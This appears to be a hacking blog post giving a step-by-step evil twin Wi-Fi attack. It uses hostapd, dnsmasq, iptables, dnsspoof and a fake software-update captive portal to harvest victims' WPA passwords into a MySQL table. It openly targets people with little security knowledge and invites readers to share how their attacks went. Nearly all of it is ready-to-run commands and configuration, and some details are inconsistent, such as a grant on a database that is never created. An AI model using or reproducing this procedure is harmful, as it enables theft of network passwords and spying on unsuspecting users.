KNOW HOW TO PERFORM EVIL TWIN ATTACK

Now evil twin is a very powerful attack used by many hackers to gain access to other's wifi 

Evil twin attack can be performed easily, instead of writing scripts and using programs such as fluxin this attack can become handy.

Creating a fake access point can be useful in many scenarios.

We can monitor and spy on them and steal credentials and passwords they enter and we can steal wifi passwords without using a dictionary even if it is WPA or WPA2

Same method can be used to start a normal fake Ap or honeypot for other uses

A quick definition of an evil twin attack is

An attack when a hacker sets up  a fake wifi network looks like a legitimate access point to steal victims sensitive details

Most often victims of such attacks are ordinary people having limited knowledge about security

When victim connects our fake access point we will display a page asking for a software update and victim have to enter the password and click enter and the password will store in our database management system which is MySQL

for displaying the page you can download templates using google

"evil twin attack can be done in number of ways"

Let's see what are steps involved in this attack

step1:- start a fake access point with same identical name as the target network

step2:- disconnect a client 

step3:- wait for them to connect a fake access point.

step4:-once they connect, automatically display a page asking for a network key.

Let's get into the process,

# --- Preparing ---:

apt-get update

apt-get install hostapd dnsmasq apache2 

airmon-ng start wlan0

mkdir ~/fap

cd ~/fap

nano hostapd.conf 

 # Instructions for hostapd.conf: 

interface=[INTERFACE NAME]

driver=nl80211

ssid=[WiFi NAME]

hw_mode=g

channel=8

macaddr_acl=0

ignore_broadcast_ssid=0

nano dnsmasq.conf

 # Instructions for dnsmasq.conf: 

interface=[INTERFACE NAME]

dhcp-range=192.168.1.2, 192.168.1.30, 255.255.255.0, 12h

dhcp-option=3, 192.168.1.1

dhcp-option=6, 192.168.1.1

server=8.8.8.8

log-queries

log-dhcp

listen-address=127.0.0.1

 # Routing table and gateway:

ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0

route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

 # Internet access:

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

iptables --append FORWARD --in-interface wlan0mon -j ACCEPT

echo 1 > /proc/sys/net/ipv4/ip_forward

 # mysql database:

service mysql start

mysql

create database fap;

create user fapuser;

grant all on rogueap.* to 'fapuser'@'localhost' identified by 'fappassword';

use fap;

create table wpa_keys(password1 varchar(40), password2 varchar(40));

ALTER DATABASE fap CHARACTER SET 'utf8';

select * from wpa_keys;

# Captive portal setup:

rm -rf /var/www/html/*

mv ~/Downloads/fap.zip /var/www/html

cd /var/www/html

unzip fap.zip 

service apache2 start

 # --- Starting the attack ---: 

hostapd hostapd.conf

dnsmasq -C dnsmasq.conf -d

dnsspoof -i wlan0mon

number of people fall for this attack and that's it for today comment below how did u perform this attack

thank you for reading our blog,

hope your enjoying our content and share our blog,

credits:-

spidyboy dark rider.